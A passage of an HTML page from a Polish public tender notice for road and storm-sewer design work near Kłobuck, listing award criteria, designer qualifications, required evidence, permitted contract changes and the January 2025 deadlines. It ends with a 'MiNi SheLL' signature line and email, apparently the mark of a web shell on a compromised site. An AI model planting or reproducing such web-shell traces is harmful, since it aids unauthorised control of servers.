kanalizacyjnej deszczowej lub sanitarnej o zaprojektowanej długości min. 100,00 mb, a<br/>dokumentacje te były wykonane przed upływem terminu składania ofert, to Wykonawca otrzyma następującą ilość punktów:<br/>• za opracowanie jednej dokumentacji projektowej spełniającej w/w wymagania to wartość liczbowa ocenianego kryterium<br/>uzyskanego dla danej oferty wyniesie 0 punktów;<br/>• za opracowanie dwóch dokumentacji projektowych spełniających w/w wymagania to wartość liczbowa ocenianego kryterium<br/>uzyskanego dla danej oferty wyniesie 20 punktów;<br/>• za opracowanie czterech dokumentacji projektowych spełniających w/w wymagania to wartość liczbowa ocenianego kryterium<br/>uzyskanego dla danej oferty wyniesie 40 punktów.<br/>Szczegółowe informacje w XXII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolność do występowania w obrocie gospodarczym<br/>Zamawiający nie określa szczegółowych warunków udziału w postępowaniu w tym zakresie.<br/>2. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie określa szczegółowych warunków udziału w postępowaniu w tym zakresie.<br/>3. Sytuacja ekonomiczna lub finansowa<br/>Zamawiający nie określa szczegółowych warunków udziału w postępowaniu w tym zakresie.<br/>4 . Zdolność techniczna lub zawodowa<br/>1) w zakresie spełnienia warunku posiadania kwalifikacji zawodowych Zamawiający będzie uznawał, wykazanie przez<br/>Wykonawcę, że skieruje do realizacji zamówienia publicznego zespół projektowy składający się z minimum jednej osoby<br/>pełniącej funkcję projektanta i posiadającej:<br/>a) uprawnienia budowlane do projektowania w specjalności inżynieryjnej drogowej bez ograniczeń zgodnie z ustawą Prawo<br/>Budowlane (Dz. U. z 2024r., poz. 725 t.j. z dnia 2024.05.14) lub odpowiadające im uprawnienia, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów upoważniające do projektowania w zakresie wymaganym do realizacji<br/>niniejszego zamówienia lub ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów<br/>budownictwa (Dz. U. z 2023r., poz. 551 t.j. z dnia 2023.03.23) oraz ustawy z dnia 22 grudnia 2015r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2023r., poz. 334 t.j. z dnia<br/>2023.02.23);<br/>b) uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń zgodnie z ustawą Prawo Budowlane (Dz. U. z<br/>2024r., poz. 725 t.j. z dnia 2024.05.14) lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów upoważniające do projektowania w zakresie wymaganym do realizacji niniejszego zamówienia<br/>lub ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z<br/>2023r., poz. 551 t.j. z dnia 2023.03.23) oraz ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2023r., poz. 334 t.j. z dnia 2023.02.23);<br/>Uwaga1): Zamawiający dopuszcza możliwość łączenia funkcji w przypadku osób, które posiadają wyżej wymienione<br/>uprawnienia w więcej niż jednej specjalności.<br/>2) w zakresie spełnienia warunku posiadania doświadczenia zawodowego Zamawiający będzie uznawał, wykazanie przez<br/>Wykonawcę w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>gospodarczej jest krótszy – w tym okresie – wykonania należycie co najmniej jednej usługi polegającej na opracowaniu<br/>dokumentacji projektowej w zakresie budowy, przebudowy, rozbudowy drogi z jezdnią o nawierzchni twardej, ulepszonej, o<br/>zaprojektowanej długości jezdni nie mniejszej niż 300mb.<br/>Uwaga1): Jednocześnie zamawiający informuje, że doświadczenie Wykonawcy nie musi być wykazane w jednym zadaniu<br/>inwestycyjnym tzn. możliwe jest odrębne wykazanie wykonania jednej dokumentacji projektowej drogi, odrębne wykazanie<br/>wykonania jednej dokumentacji projektowej kanalizacji deszczowej lub sanitarnej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania braku podstaw (przesłanek) wykluczenia z postępowania, na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia, w terminie nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych (aktualnych na dzień ich złożenia), w postaci:<br/>1)	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu w zakresie podstaw do wykluczenia wskazanych w ust.2 pkt 2.1 oraz 2.2 (załącznik nr 10 do SWZ).<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia w zakresie ust. 4.1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/>W przypadku korzystania przez Wykonawcę ze zdolności technicznych lub zawodowych albo sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, Wykonawca przedstawia wraz z oświadczeniem, o którym mowa powyżej, także oświadczenie podmiotu udostępniającego zasoby, o aktualności informacji zawartych w oświadczeniu o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu w zakresie podstaw do wykluczenia wskazanych w ust. 2 pkt 2.1 oraz 2.2) zgodnie z załącznikiem nr 11 do SWZ. <br/>2)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej (załącznik nr 12 do SWZ) w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 594 t.j. ), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, przedmiotowe oświadczenie w zakresie ust. 4.2 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełniania warunków udziału w postępowaniu (określonych przez Zamawiającego w ust. 3 niniejszego rozdziału SWZ), na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia, w terminie nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia): <br/>1)	celu wykazania spełniania warunku z ust 3.4 ppkt 1 litery a) i b):<br/>- wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (zał. nr 13 do SWZ). <br/>Uwaga1): Zamawiający dopuszcza możliwość łączenia funkcji w przypadku osób, które posiadają wyżej wymienione uprawnienia w więcej niż jednej specjalności. <br/><br/>2)	celu wykazania spełniania warunku z ust 3.4 ppkt 2:<br/>- wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych (załącznik nr 14 do SWZ), w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie.<br/>Uwaga1): Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot,<br/> na rzecz którego usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w <br/>stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się <br/>lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte <br/>wykonywanie (dokumenty powinny być wystawione w okresie ostatnich 3 miesięcy). Okres, o którym wyżej <br/>mowa liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>Uwaga2): Jednocześnie zamawiający informuje, że doświadczenie Wykonawcy nie musi być wykazane w jednym zadaniu inwestycyjnym tzn. możliwe jest odrębne wykazanie wykonania jednej dokumentacji projektowej drogi, odrębne wykazanie wykonania jednej dokumentacji projektowej kanalizacji deszczowej.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dla przeprowadzenia oceny ofert (tj. uzyskania określonej ilości punktów w ramach kryterium dodatkowego doświadczenia<br/>projektantów) każdy<br/>Wykonawca zobowiązany jest:<br/>1. Wskazać w Formularzu ofertowym z imienia i nazwiska osobę, która będzie pełnić funkcję projektanta i będzie brała<br/>udział w realizacji zamówienia<br/>(Zamawiający wymaga osobistego wykonywania świadczenia przez tę osobę);<br/>2. Wymienić w Formularzu ofertowym nazwę zadań wraz z opisem usługi polegającej na opracowaniu dokumentacji<br/>projektowo – kosztorysowej w<br/>rozumieniu ustawy Prawo budowlane w zakresie:<br/>1) budowy, przebudowy lub rozbudowy drogi publicznej, w której uczestniczył wskazany projektant wraz z podaniem<br/>kilometrażu projektowanej drogi<br/>publicznej dla której opracowano dokumentację projektowo-kosztorysową;<br/>2) budowy, przebudowy lub rozbudowy: sieci kanalizacji deszczowej lub sanitarnej, w której uczestniczył wskazany<br/>projektant wraz z podaniem długości<br/>zaprojektowanej sieci kanalizacji deszczowej lub sanitarnej dla której opracowano dokumentację projektowo-kosztorysową;<br/>Uwaga: Wykonawca może wskazać doświadczenie poszczególnych projektantów przy realizacji dokumentacji projektowo –<br/>kosztorysowych w ramach<br/>odrębnych zadań inwestycyjnych.<br/>3. Przedłożyć przy ofercie dokumenty, inne niż oświadczenia własne Wykonawcy, potwierdzające, że wykazane usługi<br/>zostały wykonane należycie i że<br/>dedykowana osoba pełniła przy ich realizacji funkcję projektanta (odpowiednio dla danej branży). Do dokumentów tych<br/>należą np.:<br/>- podpisane protokoły zdawczo-odbiorcze dokumentacji projektowych;<br/>- oświadczenie inwestora, potwierdzające że dedykowana osoba pełniła w wykazanych przedsięwzięciach funkcję<br/>projektanta;<br/>- referencje wystawione przez Inwestora dla Wykonawcy usługi projektowej, zawierające wykaz osób pełniących funkcję<br/>projektanta;<br/>- kopia decyzji pozwalającej na budowę i zatwierdzającej projekt budowlany, przy realizacji którego dedykowana osoba<br/>pełniła funkcję projektanta;<br/>- oświadczenie dedykowanej osoby, potwierdzające że pełniła ona w wykazanych przedsięwzięciach funkcję projektanta.<br/>Dowody potwierdzające, że: wykazane usługi zostały wykonane należycie oraz, że dedykowana osoba pełniła przy ich<br/>realizacji funkcję projektanta<br/>muszą zostać załączone przez Wykonawcę przy ofercie.<br/>Uwaga: nieprzedłożenie przy ofercie dowodów, o których mowa powyżej, potwierdzających że wykazane usługi zostały<br/>wykonane należycie oraz że<br/>dedykowana osoba pełniła przy ich realizacji funkcję projektanta spowoduje, że Zamawiający przyzna Wykonawcy w<br/>kryterium doświadczenia<br/>projektantów 0 pkt;<br/>Dowodami, o których mowa powyżej, nie mogą być oświadczenia własne Wykonawcy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 6.	Wraz z ofertą należy złożyć: <br/>1)	dokumenty, inne niż oświadczenia własne Wykonawcy, potwierdzające, że wskazane w formularzu ofertowym usługi zostały wykonane należycie i że dedykowana osoba pełniła przy ich realizacji funkcję projektanta. <br/>Dokumenty o których mowa w pkt. 1 stanowią przedmiotowe środki dowodowe i muszą zostać załączone przez Wykonawcę przy ofercie. Te przedmiotowe środki dowodowe, zgodnie z art. 107 ust.3 ustawy nie podlegają ponownemu złożeniu lub uzupełnieniu.<br/>2)	oświadczenie, o którym mowa w art. 125 ust. 1 ustawy. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, stanowi dowód potwierdzający brak podstaw wykluczenia i spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe. Wzór oświadczenia stanowi załącznik nr 6 do SWZ.<br/>3)	Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w art. 125 ust. 1 ustawy, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby. Wzór oświadczenia stanowi załącznik nr 7 do SWZ.<br/>4)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które części dokumentacji wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi załącznik nr 15 do SWZ.<br/>5)	Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, składa, wraz z ofertą zobowiązanie podmiotu udostępniającego Wykonawcy zasoby, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (o ile Wykonawca korzysta ze zdolności innych podmiotów na zasadach określonych w art. 118 ustawy). <br/> Wzór zobowiązania podmiotu udostępniającego zasoby stanowi załącznik nr 9 do SWZ.<br/>6)	W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do reprezentowania należy dołączyć do oferty - odpis lub informacje z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. <br/>7)	Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej. Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. <br/>8)	Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani są złożyć wraz z ofertą stosowne<br/>pełnomocnictwo – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki<br/>wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Uwaga nr 1: Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z<br/>umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie<br/>(przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art.<br/>125 ustawy (pkt 6 rozdziału XII SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia<br/>te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o<br/>udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w<br/>oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe oznacza, iż:<br/>5.1. Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia;<br/>5.2. Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w<br/>postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie<br/>podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/>6. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany umowy możliwe są jedynie na zasadach określonych w ustawie Prawo zamówień publicznych. Uzgodnienia w tym<br/>zakresie wymagają dla swej ważności zatwierdzenia przez Zamawiającego, a zmiana umowy może nastąpić jedynie na<br/>piśmie w formie aneksu pod rygorem nieważności.<br/>2. Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na<br/>podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych<br/>poniżej, z uwzględnieniem podanych poniżej warunków ich wystąpienia oraz warunków zmiany umowy:<br/>1) w zakresie zmiany terminu zakończenia przedmiotu zamówienia objętego umową o określoną liczbę dni, w których nie<br/>można było wykonywać dokumentacji projektowo-kosztorysowej, dopuszczalne jest wprowadzenie zmian spowodowanych<br/>udokumentowanymi:<br/>a) okolicznościami leżącymi po stronie Zamawiającego,<br/>b) zmianami będącymi następstwem działania organów administracji,<br/>c) innymi przyczynami zewnętrznymi niezależnymi od Wykonawcy, skutkującymi niemożnością rozpoczęcia lub<br/>prowadzenia prac pomimo zachowania należytej staranności,<br/>d) przerwami z przyczyn leżących po stronie Zamawiającego,<br/>e) przedłużeniami opiniowania lub zatwierdzania przez TAURON Dystrybucja S.A., Powiatowy Zarząd Dróg w Kłobucku,<br/>Zarząd Dróg i Gospodarki Komunalnej w Kłobucku, Przedsiębiorstwo Wodociągów i Kanalizacji Okręgu Częstochowskiego<br/>S.A. w Częstochowie, ORANGE Polska Dostarczanie i Serwis Usług, Wydział Ewidencji i Zarządzania Danymi o<br/>infrastrukturze w Opolu, FIBEE I Sp. z o.o., Wysogotowo, ul. Wierzbowa 84, 62-081 Przeźmierowo lub innych gestorów sieci<br/>infrastruktury technicznej, opracowań projektowych powyżej 30 dni o ile nie wynika to z zaniedbań Wykonawcy;<br/>2) w zakresie zmiany obowiązującej stawki VAT:<br/>a) jeśli dojdzie do podwyższenia stawki VAT, Strony uzgadniają zwiększenie wynagrodzenia o kwotę równą różnicy w<br/>kwocie podatku VAT spowodowanej podwyższeniem stawki podatku VAT,<br/>b) jeśli dojdzie do obniżenia stawki VAT, Wykonawca wyraża zgodę na zmniejszenie wynagrodzenia o kwotę stanowiącą<br/>różnicę kwoty podatku VAT spowodowaną obniżeniem stawki podatku VAT;<br/>3) w zakresie zmiany osoby projektanta: za zgodą Zamawiającego, Wykonawca ma prawo dokonać zmiany projektanta pod<br/>warunkiem, że doświadczenie nowego, proponowanego projektanta, będzie co najmniej równe doświadczeniu osoby<br/>wskazanej § 6 ust. 3 Umowy; w przypadku zmiany projektanta, Wykonawca ma obowiązek udowodnić Zamawiającemu<br/>doświadczenie nowej osoby;<br/>4) w zakresie pozostałych zmian wynikających ze zmiany powszechnie obowiązujących przepisów prawa w zakresie<br/>mającym wpływ na realizację przedmiotu umowy; Strony z<br/>zachowaniem zasad uczciwej konkurencji oraz poszanowania interesów każdej ze stron będą zmierzać do dostosowania<br/>umowy do zmian wynikających z wprowadzenia nowych przepisów prawa; w takim wypadku zmiany umowy ograniczać się<br/>będą do konieczności wynikającej ze zmiany powszechnie obowiązującego prawa, tj. nie mogą być dokonane wówczas, gdy<br/>przepisy takie mają charakter dyspozycyjny (względnie obowiązujący).<br/>3. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 2 pkt 1, termin wykonania umowy określony<br/>we wstępie do wyliczenia w § 2 ust. 2 może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia<br/>wykonywania przedmiotu umowy w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-09 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com